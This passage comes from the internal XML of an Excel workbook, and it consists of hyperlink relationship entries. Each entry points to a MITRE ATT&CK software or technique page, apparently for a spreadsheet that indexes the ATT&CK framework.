Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0454" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0569" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0220" TargetMode="External"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0376" TargetMode="External"/><Relationship Id="rId331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0112" TargetMode="External"/><Relationship Id="rId373" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0559" TargetMode="External"/><Relationship Id="rId429" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0221" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0066" TargetMode="External"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0576" TargetMode="External"/><Relationship Id="rId440" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0219" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0360" TargetMode="External"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0365" TargetMode="External"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0097" TargetMode="External"/><Relationship Id="rId482" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0108" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0492" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0355" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0431" TargetMode="External"/><Relationship Id="rId342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0511" TargetMode="External"/><Relationship Id="rId384" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0140" TargetMode="External"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0585" TargetMode="External"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0080" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0534" TargetMode="External"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0216" TargetMode="External"/><Relationship Id="rId451" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0430" TargetMode="External"/><Relationship Id="rId493" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0350" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0025" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0502" TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0049" TargetMode="External"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0581" TargetMode="External"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0441" TargetMode="External"/><Relationship Id="rId353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0400" TargetMode="External"/><Relationship Id="rId395" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0374" TargetMode="External"/><Relationship Id="rId409" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0146" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0334" TargetMode="External"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0395" TargetMode="External"/><Relationship Id="rId420" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0266" TargetMode="External"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0205" TargetMode="External"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0587" TargetMode="External"/><Relationship Id="rId462" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0330" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0082" TargetMode="External"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0132" TargetMode="External"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0269" TargetMode="External"/><Relationship Id="rId364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0028" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0077" TargetMode="External"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0356" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0031" TargetMode="External"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0500" TargetMode="External"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0359" TargetMode="External"/><Relationship Id="rId431" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0022" TargetMode="External"/><Relationship Id="rId473" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0008" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0114" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0267" TargetMode="External"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0070" TargetMode="External"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0148" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0020" TargetMode="External"/><Relationship Id="rId375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0578" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0469" TargetMode="External"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0455" TargetMode="External"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0264" TargetMode="External"/><Relationship Id="rId400" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0491" TargetMode="External"/><Relationship Id="rId442" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0579" TargetMode="External"/><Relationship Id="rId484" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0385" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0381" TargetMode="External"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0124" TargetMode="External"/><Relationship Id="rId344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0332" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0268" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0046" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0398" TargetMode="External"/><Relationship Id="rId386" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0444" TargetMode="External"/></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet2.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1555/002" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1098/002" TargetMode="External"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1112" TargetMode="External"/><Relationship Id="rId531" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1204/002" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1114/003" TargetMode="External"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/005" TargetMode="External"/><Relationship Id="rId475" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1608/001" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1595/002" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1001" TargetMode="External"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1046" TargetMode="External"/><Relationship Id="rId542" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1497/003" TargetMode="External"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1611" TargetMode="External"/><Relationship Id="rId402" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1572" TargetMode="External"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/001" TargetMode="External"/><Relationship Id="rId486" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1553/006" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1123" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1602/001" TargetMode="External"/><Relationship Id="rId346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/003" TargetMode="External"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/014" TargetMode="External"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1048/003" TargetMode="External"/><Relationship Id="rId413" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1021" TargetMode="External"/><Relationship Id="rId497" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1016" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1531" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1543" TargetMode="External"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1556/001" TargetMode="External"/><Relationship Id="rId357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1588/004" TargetMode="External"/><Relationship Id="rId522" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552/006" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/010" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1584/005" TargetMode="External"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1484/002" TargetMode="External"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1212" TargetMode="External"/><Relationship Id="rId399" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/003" TargetMode="External"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/004" TargetMode="External"/><Relationship Id="rId424" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1014" TargetMode="External"/><Relationship Id="rId466" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1216" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1583" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1485" TargetMode="External"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/008" TargetMode="External"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1601/002" TargetMode="External"/><Relationship Id="rId533" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1204/001" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1037/001" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1001/003" TargetMode="External"/><Relationship Id="rId368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1137/005" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1114/002" TargetMode="External"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1187" TargetMode="External"/><Relationship Id="rId435" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1597" TargetMode="External"/><Relationship Id="rId477" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1528" TargetMode="External"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/006" TargetMode="External"/><Relationship Id="rId337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1040" TargetMode="External"/><Relationship Id="rId502" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1569" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1071/004" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1612" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1213/001" TargetMode="External"/><Relationship Id="rId379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1598/001" TargetMode="External"/><Relationship Id="rId544" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1600" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1134/002" TargetMode="External"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1585/002" TargetMode="External"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1589/002" TargetMode="External"/><Relationship Id="rId390" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055" TargetMode="External"/><Relationship Id="rId404" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1090/004" TargetMode="External"/><Relationship Id="rId446" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1593/001" TargetMode="External"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1591/001" TargetMode="External"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1490" TargetMode="External"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1557/001" TargetMode="External"/><Relationship Id="rId488" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1553/004" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1020" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/004" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1543/004" TargetMode="External"/><Relationship Id="rId348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/002" TargetMode="External"/><Relationship Id="rId513" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1127/001" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1587/002" TargetMode="External"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/006" TargetMode="External"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1011" TargetMode="External"/><Relationship Id="rId415" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1021/001" TargetMode="External"/><Relationship Id="rId457" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/002" TargetMode="External"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/007" TargetMode="External"/><Relationship Id="rId499" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1049" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1087/004" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/007" TargetMode="External"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1556/002" TargetMode="External"/><Relationship Id="rId359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1588/001" TargetMode="External"/><Relationship Id="rId524" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1535" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1584/001" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1132/002" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1482" TargetMode="External"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1068" TargetMode="External"/><Relationship Id="rId370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1120" TargetMode="External"/><Relationship Id="rId426" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053/001" TargetMode="External"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1606/002" TargetMode="External"/><Relationship Id="rId468" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1072" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1583/002" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1037/004" TargetMode="External"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/010" TargetMode="External"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1104" TargetMode="External"/><Relationship Id="rId535" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078/004" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1074" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1573/002" TargetMode="External"/><Relationship Id="rId381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1566/002" TargetMode="External"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1590" TargetMode="External"/><Relationship Id="rId437" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1597/001" TargetMode="External"/><Relationship Id="rId479" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1558" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1071/003" TargetMode="External"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1070" TargetMode="External"/><Relationship Id="rId339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1571" TargetMode="External"/><Relationship Id="rId490" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1553/003" TargetMode="External"/><Relationship Id="rId504" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1569/002" TargetMode="External"/><Relationship Id="rId546" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1600/001" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1580" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1584/006" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1005" TargetMode="External"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546" TargetMode="External"/><Relationship Id="rId350" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1027/001" TargetMode="External"/><Relationship Id="rId406" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1090/001" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1134/004" TargetMode="External"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1052" TargetMode="External"/><Relationship Id="rId392" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/001" TargetMode="External"/><Relationship Id="rId448" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1505" TargetMode="External"/><Relationship Id="rId252" 